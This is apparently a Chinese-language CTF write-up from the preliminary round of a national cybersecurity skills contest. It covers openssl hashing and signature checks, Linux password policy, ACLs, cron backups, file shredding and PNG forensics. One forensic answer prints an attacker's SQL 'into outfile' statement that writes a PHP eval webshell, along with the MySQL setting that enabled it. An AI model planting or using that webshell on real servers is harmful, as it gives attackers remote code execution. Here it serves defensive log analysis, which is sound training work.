全国网络安全行业职业技能大赛-初赛

WriteUp 11个月前 admin
231 0 0

全国网络安全行业职业技能大赛-初赛

使用openssl工具对/opt/document.txt文件进行SHA-256算法进行校验,将命令作为flag提交

根据题目要求,命令为 openssl dgst -sha256 /opt/document.txt 去除空格作为flag

flag: openssldgst-sha256/opt/document.txt

使用私钥对secret.enc进行解密,将解密后的内容作为flag提交

使用命令 openssl rsautl -decrypt -in secret.enc -inkey private_key.pem -out flag.txt,获取flag.txt,

flag: flag{you_re_very_good_at_crypto}

根据私钥创建公钥文件public_key.pem,将命令作为flag提交(参数顺序按照参数字段的字数从短到长排序)

创建公钥的命令为 openssl rsa -in private_key.pem -out public_key.pem -pubout 去除空格作为flag

flag: opensslrsa-inprivate_key.pem-outpublic_key.pem-pubout

使用公钥public_key.pem和签名文件document.sha256验证document.txt是否被篡改,将校验后输出的结果作为flag提交

签名验证的命令为 openssl dgst -sha1 -verify public_key.pemm -signature document.sha256 document.txt ,返回结果为 Verification Failure,去除空格,转小写为flag

flag: verificationfailure

mysql的命令历史文件中会包含许多历史操作记录,如登录时将密码直接跟在-p参数后,则会将明文密码记录到历史文件中。为防止敏感信息泄漏,删除该文件,将该文件的绝对路径作为flag提交

尝试一下登录操作,就会生成该文件,该文件的绝对路径为 /root/.mysql_history

flag: /root/.mysql_history

你负责一个系统的安全,该系统需要执行更严格的密码策略。配置口令更换周期为90天,将修改的配置文件地址和添加的配置项直接拼接作为flag提交

配置文件地址为/etc/login.defs,密码最大有效期 PASS_MAX_DAYS 90,

flag: /etc/login.defspass_max_days90

你负责一个系统的安全,该系统需要执行更严格的密码策略。配置口令更改最小间隔天数为6天,将修改的配置文件地址和添加的配置项直接拼接作为flag提交

配置文件地址为/etc/login.defs,两次修改密码的最小间隔时间 PASS_MIN_DAYS 6

flag: /etc/login.defspass_min_days6

你负责一个系统的安全,该系统需要执行更严格的密码策略。配置口令过期前警告天数为30天,将修改的配置文件地址和添加的配置项直接拼接作为flag提交

配置文件地址为/etc/login.defs,#密码过期前多少天开始提示PASS_WARN_AGE 30

flag: /etc/login.defspass_warn_age30

创建tom用户,同时让tom用户登入时直接进入python3解释器,将命令作为flag提交

根据题目要求,命令为 useradd -s /usr/bin/python3 tom,去除空格作为flag

flag: useradd-s/usr/bin/python3tom

为tom用户分配特定数据集的权限。这个数据集位于/var/securedata目录下,需要在不修改原有权限的情况下,令tom能够读取和写入该目录及其下的文件,将授权的ACL命令作为flag提交(参数顺序按照参数内容的字数从短到长排序)

根据题目要求,命令为 setfacl -r -m u:tom:rw/var/securedata,去除空格作为flag,去除空格作为flag

flag: setfacl-r-mu:tom:rw/var/securedata

需要每天对/var/securedata进行备份,请将编辑计划任务的命令作为flag提交

编辑计划任务的命令 为 crontab -e 去除空格作为flag

flag: crontab-e

需要每天对/var/securedata进行备份,计划每天0点0分0秒时将数据全量备份至/opt下,请提交计划任务的配置

题目要求对应 crontab 配置为 0 0 * * * cp -r /var/securedata /opt

flag: 00***cp-r/var/securedata/opt

分析数据库的历史general log,找出写出了木马文件的SQL语句。将这个SQL语句作为flag提交

导出/opt 目录下的 exec_log,搜索 into outfile,得到 

全国网络安全行业职业技能大赛-初赛

flag: select"<?phpeval(@$_POST['a']);?>"intooutfile'/usr/local/nginx/html/webshell101.php'

找出导致木马写入的配置项,并将配置该行作为flag提交

相关配置在 my.ini 文件中,

flag: secure_file_priv=/

请使用文件粉碎工具将木马文件安全地粉碎10次,以确保其数据无法恢复。将你执行粉碎操作命令作为flag提交

前面的sql语句得知木马文件的路径,linux 粉碎工具 为 shred,所以粉碎命令为:shred -n 10 /usr/local/nginx/html/webshell101.php

flag: shred-n10/usr/local/nginx/html/webshell101.php

在/opt/data文件夹下搜索被恶意修改过的文件。使用命令行工具进行高效搜索,并将找到文件的内容为flag提交

ls -la,然后查看日期不对的文件,发现file2988日期不对,长度也不对,只有24,里面有

flag: flag{you_found_it_haha}

修复/opt/data目录的权限问题。你需要设置test用户拥有此目录的完全权限,而admin组只能查看,其他人没有权限。使用命令行设置权限后,将文件夹ugo的权限以八进制形式作为flag提交

根据题目要求,该目录权限应为 rwxr—–,应该740,但是经过测试,770为正确flag

flag: 770

从安全设备上截取到一张缺失的图片,放在/opt/flag.zip中,现怀疑内含有可疑数据,请对图片进行分析,然后将可疑数据作为flag提交

将图片拖进010ditor,发现在图片尾部的四个chunk的crc报错,

全国网络安全行业职业技能大赛-初赛

查看发现是 IDAT 标识符被删除,

全国网络安全行业职业技能大赛-初赛

补上后图片正常显示,但是没发现flag,后面经过测试,发现对图片进行fft变换可以有flag字符串

全国网络安全行业职业技能大赛-初赛

全国网络安全行业职业技能大赛-初赛flag: flag{a8ff749ccfa57278aaf922fb70db6e48}


原文始发于微信公众号(Van1sh):全国网络安全行业职业技能大赛-初赛

版权声明:admin 发表于 2023年12月17日 下午6:15。
转载请注明:全国网络安全行业职业技能大赛-初赛 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...